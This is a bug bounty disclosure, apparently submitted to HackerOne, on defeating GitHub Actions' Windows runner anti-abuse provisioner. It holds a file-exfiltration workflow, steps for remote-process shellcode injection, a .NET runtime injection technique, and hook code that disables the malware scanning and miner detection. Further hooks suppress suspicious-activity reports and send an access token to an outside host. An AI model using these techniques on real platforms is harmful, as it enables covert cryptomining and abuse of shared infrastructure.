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What is it?

From July 11 to July 22, 2022, I worked on the old idea associated with an attempt to participate in a HackerOne bug bounty program. This report related to vulnerability in Github Actions. HackerOne rewared me with 500$ and a t-shirt at August 2, 2022!

You can verify it in my profile:


Table of contents

Bypassing Virtual Environment Provisioner restrictions to do something unexpected in GitHub Actions

I made the private repository that is located at and contains source code. If you can't access it, send me your GitHub username. So, I'll invite you.

As an alternative, I have attached the code of all projects, which maybe will useful at HackerOne.


I got interested in writing GitHub Actions script for automation and came across an article: Crypto-mining attack in my GitHub actions through Pull Request . It became interesting to me how exactly GitHub prevents such attacks. That's why I did this report.

What is Virtual Environment Provisioner?

Every time you run GitHub Actions as a normal user on a virtual machine, a program called "Virtual Environment Provisioner" is launches at the background


I had to use reverse RDP on your system to figure out this. So, all this report targets at windows-latest VMs. Provisioner is located at C:\actions\runner-provisioner-Windows in file provisioner.exe

This program deals with the maintenance of the virtual machine, and I could not find it in the Open Source. I decided to steal it's executable for analysis using the following actions:


name: Give me files for reverse engineering

    runs-on: windows-latest

      - uses: actions/checkout@v3

      - name: Steal some files for me to analyze
        run: |
          Copy-Item C:\Windows\System32\kernel32.dll .\
          Copy-Item C:\actions\runner-provisioner-Windows\hostfxr.dll .\
          Copy-Item -Recurse C:\actions\runner-provisioner-Windows .\

      - uses: actions/upload-artifact@v3
          name: libraries
          path: |

      - uses: actions/upload-artifact@v3
          name: program
          path: runner-provisioner-Windows

After getting the executable, I used dnSpyEx to analyze it and found many interesting things


provisioner.framework.dll contains this classes, I also did screenshot of the decompiled code to show most important things:

  • ActivityLogMonitorJob - reports suspicious activity 03_ActivityLogMonitorJob
  • HostsFileMonitorJob - checks that C:\Windows\System32\Drivers\etc\hosts not changed to block mining pools 04_HostsFileMonitorJob
  • MachineHealthMonitorJob - sends some (CPU, RAM?) metrics over the network 05_MachineHealthMonitorJob
  • MachineInfoMonitorJob - not sure
  • NetworkHealthMonitorJob - checks that network is reachable
  • ProcessMonitorJob - checks if process has mining-related activity (arguments, process name) 06_ProcessMonitorJob
  • ProvjobdMonitorJob - runs some golang executable file
  • SuspiciousFilesMonitorJob - recursively scans for malware/miners at the VM 07_SuspiciousFilesMonitorJob

So, Virtual Environment Provisioner has security system to prevent abuse actions. If you try to kill provisioner.exe GitHub Actions immediately stop your script.

My idea without going into the technical part

The process provisioner.exe isn't isolated from custom scripts and runs as the user runneradmin. My idea is to inject malicious code into this process right at runtime using custom script. This would allow me to change anything in the existing security system against mining or abusing. Imagine we could change the functionality that sends CPU metrics and set CPU usage to near zero. Then we bypass the other constraints and perform actions that should be detected by your security system.

How it's could be done?


At first need to perform shellcode injection. You can read about it here: Executing Shellcode in Remote Process

For this need to do following:

  1. find provisioner.exe process id using CreateToolhelp32Snapshot and Process32NextW
  2. get handle of process by id using OpenProcess
  3. allocate virtual memory inside this process using VirtualAllocEx
  4. write malicious shellcode bytes into allocated memory using WriteProcessMemory
  5. create a thread with malicious code and set the thread's entry point as previously allocated block of memory using CreateRemoteThread
  6. wait for result by calling WaitForSingleObject
  7. check if inject was successful using GetExitCodeThread

I put this code into projects/cpp/app/codeinjector/src/main.cpp. So, you can see how it was done

This injection is still not enough to get to c# code. I spent about a week while doing reverse engineering work dotnet internals and found this article: Write a custom .NET host to control the .NET runtime from your native code

It contains useful code that I used to produce my own injector to NET Core applications. I really couldn't solve this problem for a long time. The first successful injector was written on May 7, 2021.

Well, I wrote module that is called bootstrapper. You again can see source code if you need at projects/cpp/app/bootstrapper/src/main.cpp

How to inject into dotnet runtime?

  1. extract C# DLLs into %TEMP% directory

  2. find base address of hostfxr.dll library

  3. find hostfxr_get_runtime_delegate() address

  4. the most hard thing was obtain fx_muxer_t::get_active_host_context() function address

    This function isn't marked as exported. The only way to find it is to search through the machine code and find 2nd call instruction. After that need to do the same as the processor to calculate the address

    So, I used IDA Pro to locate where fx_muxer_t::get_active_host_context() is used. It's used in hostfxr_get_runtime_properties which is also exported! It allows me to get address of this function hostfxr_aslr_bypass_01

    We need only the line:

    .text:00000001800135FA E8 E1 35 00 00 call fx_muxer_t::get_active_host_context(void)

    In x86_64 assembler each call instruction starts from opcode 0xE8: see

    E1 35 00 00 is offset that determines where to jump, it's encoded as little endian. This instruction can be decoded as [.text:00000001800135FA] call 0x35E1

    So, we can calculate address of fx_muxer_t::get_active_host_context(): 0x00000001800135FA + 0x35E1 + 5 = 0x180016be0

    • where 5 is size of call instruction
    • 0x00000001800135FA is RIP register

    In IDA Pro we can jump to 0x180016be0 and make sure that address is really points to fx_muxer_t::get_active_host_context():


    Now imagine if we write a program that does the same at runtime! It will just run through each byte and read the machine code until it finds 0xE8, and then calculate the address 03_hostfxr_aslr_bypass

    There is way that I used:

    /// function pointer to `hostfxr_get_runtime_properties` (exported)
    auto hostfxr_get_runtime_properties_fptr = loader::GetExportByHash<hostfxr_get_runtime_properties_fn>(
    /// look for 2-nd x86_64 `call` instruction (opcode 0xE8, size 5 bytes)
    /// based on code xrefs
    auto buf = reinterpret_cast<BYTE *>(hostfxr_get_runtime_properties_fptr);
    uint8_t count = 0;
    while (count != 2) {
        if (*buf++ == 0xE8) {
    auto instructionAddress = reinterpret_cast<SIZE_T>(buf);
    auto functionAddress = instructionAddress + *reinterpret_cast<DWORD *>(buf) + 5;
    /// function pointer to `fx_muxer_t::get_active_host_context`
    auto get_active_host_context_fptr = reinterpret_cast<decltype(&fx_muxer_t::get_active_host_context)>(functionAddress);
  5. call fx_muxer_t::get_active_host_context() to get active dotnet runtime context

  6. call hostfxr_get_runtime_delegate() to get native function pointer to the requested runtime functionality. It's saved as delegate

  7. obtain load_assembly_and_get_function_pointer_fn() using saved delegate

  8. call load_assembly_and_get_function_pointer_fn() with C# AssemblyInfo to inject. It will produce entrypoint function to C++ code into C#

  9. call entrypoint, in C# it's marked as [UnmanagedCallersOnly]

After successful injection I can use Harmony library to attach my code to any function of provisioner.exe. I can insert my custom code at the beginning of any C# function, then cancel execution of original function. Also, Harmony library allows performing custom code at end of function to replace its result.


Debugging Virtual Environment Provisioner using TCP-server


After a successful injection, the code will connect to my computer on the port 1337 and will send logs to me.

I wrote C# library that intercepts function

namespace Microsoft.AzureDevOps.Provisioner.Framework.Monitoring {
    class SuspiciousFilesMonitorJob {
        private bool SuspiciousSignatureExists(string directory, int currDepth) { ... }

using code like this

public class SuspiciousFilesMonitorJobPatches
    static void SuspiciousSignatureExists(
        Microsoft.AzureDevOps.Provisioner.Framework.Monitoring.SuspiciousFilesMonitorJob __instance,
        string directory,
        int currDepth
        NetworkLogger.GetInstance().Write($"{__instance.Name} // SuspiciousSignatureExists({directory}, {currDepth})");

The NetworkLogger will send all information to any IPv4 address.

I started a local server on GitHub Actions VM and just walked away for 15 minutes to get logs.


As you can see, intercepting of function works!

Proof of concept

Okay, now let's try to do the following:

  • bypass check for suspicious files (related to SuspiciousFilesMonitorJob)
  • bypass processes checking and their arguments (related to ProcessMonitorJob)
  • don't report about suspicious activity to GitHub host

As I showed earlier, there is such a function for recursively scanning directories

namespace Microsoft.AzureDevOps.Provisioner.Framework.Monitoring {
    class SuspiciousFilesMonitorJob {
        private bool SuspiciousSignatureExists(string directory, int currDepth) { ... }

Look at the screenshot above, it works like this:

SuspiciousSignatureExists(directory=@"D:\a", currDepth=0);
    SuspiciousSignatureExists(directory=@"D:\a\test-repo", currDepth=1);
        SuspiciousSignatureExists(directory=@"D:\a\test-repo\test-repo", currDepth=2);

Also let's look at the decompiled code to understand its logic:


This function will recursively go down through the directories until it reaches depth 5. So, I wrote a HarmonyPatch to fix that and remove all checks!

public class SuspiciousFilesMonitorJobPatches
    static bool SuspiciousSignatureExists(
        Microsoft.AzureDevOps.Provisioner.Framework.Monitoring.SuspiciousFilesMonitorJob __instance,
        string directory,
        int currDepth,
        ref bool __result
        NetworkLogger.GetInstance().Write($"{__instance.Name} // SuspiciousSignatureExists({directory}, {currDepth})");
        __result = false; //no suspicious files

        //don't call SuspiciousFilesMonitorJob.SuspiciousSignatureExists(...)
        //now provisioner will not scan subfolders at all
        return false;

Now this functions will stop scan and log it on currDepth=0. There is example output of this:

Suspicious Files Monitor // SuspiciousSignatureExists(directory=@"D:\a", currDepth=0)

By changing this behavior, the attacker could launch a miner, a trojan, anything prohibited on GitHub Actions!

As another example, I'll show you a way to bypass ProcessMonitorJob, but this requires reverse engineering

ProcessMonitorJob references to ScriptTaskValidator in Initialize function


Then ScriptTaskValidator creates List of IBadTokenProvider. One provider is comes from the constructor, the second is static. As a result, bad tokens are generated (this.m_regexesToMatch, this.m_stringsToMatch) to search for malicious processes


ScriptTaskValidator also has BaseBadTokenProvider, which is implemented in the same namespace. For example, it can find the Monero address in the process arguments:


As I know Monero address length is 95 characters. So, regex "4[1-9a-km-zA-HJ-NP-Z]{94}" is related to XMR. Next, we can see that these bad tokens are used in the method HasBadParamOrArgument:


Function signature looks like this:

namespace GitHub.DistributedTask.Pipelines.Validation {
    class ScriptTaskValidator {
        public bool HasBadParamOrArgument(string exeAndArgs, out string matchedPattern, out string matchedToken) { ... }

Then this function is finally called in ProcessMonitorJob:


I decided that I would not do anything bad and just demonstrate to you how to trigger security system and then my hook bypass it's check. For example, I will replace the beginning of this function, then add Monero address to its argument exeAndArgs. That functions will alreays. Now the function will mark all processes as malicious, I just would log it's args and result for demo. At the end of the function, I will change the result to false. I don't want to get ban from GitHub ;D

public class ScriptTaskValidatorPatches
    static void HasBadParamOrArgument_Prefix(ref string exeAndArgs)
        //trigger provisioner by appending XMR address to exeAndArgs
        exeAndArgs += " 48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD";

    static void HasBadParamOrArgument_Postfix(string exeAndArgs, ref bool __result)
        //checking result from original function HasBadParamOrArgument(...), it would be True for all processes
        NetworkLogger.GetInstance().Write($"ScriptTaskValidator // HasBadParamOrArgument({exeAndArgs}, ..., ...) = {__result}");
        __result = false; //set result to false to bypass provisioner check ;D

There is example output after doing this patch:

ScriptTaskValidator // HasBadParamOrArgument(dotnet "C:\Program Files\dotnet\dotnet.exe" exec "C:\Program Files\dotnet\sdk\6.0.301\Roslyn\bincore\VBCSCompiler.dll" "-pipename:q1wL+usWKy9lMQy0zJFLX69E5zGeeP3NsF75bARkrok" 48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD, ..., ...) = True
ScriptTaskValidator // HasBadParamOrArgument(conhost \??\C:\Windows\system32\conhost.exe 0x4 48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD, ..., ...) = True
ScriptTaskValidator // HasBadParamOrArgument(cmd "C:\Windows\system32\cmd.EXE" /D /E:ON /V:OFF /S /C "CALL "D:\a\_temp\b6691e1d-9d87-4460-bf1f-42cf7bfa196d.cmd"" 48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD, ..., ...) = True
ScriptTaskValidator // HasBadParamOrArgument(python python  scripts\ 48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD, ..., ...) = True
ScriptTaskValidator // HasBadParamOrArgument(taskhostw taskhostw.exe 48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD, ..., ...) = True

Such an attack may allow a Monero miner to be launched without reporting suspicious activity. Speaking of suspicious activity, I can also replace the function that reports it, but I haven't tested that so as not to do anything banned on the GitHub

Here is example code to do it:

public class MachineManagementClientPatches
    static bool ReportSuspiciousActivityAsync(
        long requestId,
        byte[] postRegistrationAccessToken,
        string suspiciousActivity,
        string poolName,
        string instanceName,
        ref Task __result
        var token = Convert.ToHexString(postRegistrationAccessToken);
        NetworkLogger.GetInstance().Write($"MachineManagementClient // ReportSuspiciousActivityAsync({requestId}, {token}, {suspiciousActivity}, {poolName}, {instanceName})");
        __result = new Task(() => {
            //replace task with nothing
        return false; //don't call MachineManagementClient.ReportSuspiciousActivityAsync(...)

You can see full code at projects/csharp/patcher/patcher/Main.cs

How to run PoC on GitHub Actions VM?

I made a complete project which has the file .github/workflows/build.yml to do this. You can upload it to GitHub, then it will automatically run action that's builds payload from sources, runs local python server and exits after 15 minutes.

If you want to repeat this, you can do as in the screenshot: 16_how_to_build_and_test_poc


In theory, a hacker can do a lot of bad things knowing such an attack vector. I just showed a proof of concept that allows a hacker to bypass Virtual Environment Provisioner restrictions to execute bad binaries without immediately ban by your automatic security system.
